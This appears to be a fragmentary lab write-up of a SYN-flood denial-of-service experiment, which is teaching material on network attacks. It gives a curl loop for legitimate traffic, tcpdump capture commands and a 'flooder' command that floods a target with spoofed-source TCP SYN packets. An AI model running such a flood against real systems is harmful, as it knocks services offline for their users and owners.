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Generating legitimate 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sudo nano bashscript.sh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#!/bin/bash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COUNTER=0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while [  $COUNTER -lt 180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 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curl 5.6.7.8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let COUNTER=COUNTER+1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chmod gou+x bashscript.sh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./bashscript.sh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execute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 Collecting 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statistics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 Cookies off on server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into attacker node, and client node.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tcpdump with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tcpdump -nn -i eth1 -w tcpdumpfile.txt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legit traffic on client node with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./bashscript.sh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30seconds , start attack with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flooder --dst 5.6.7.8 --src 1.1.2.5 --srcmask 255.255.255.0 --proto TCP --tcpflags SYN --sportmin 80 --sportmax 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120 seconds, stopped the attack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30 seconds, legit traffic stopped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is saved in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tcpdumpfile.txt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Viewed the results with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tcpdump -q  -r tcpdump.txt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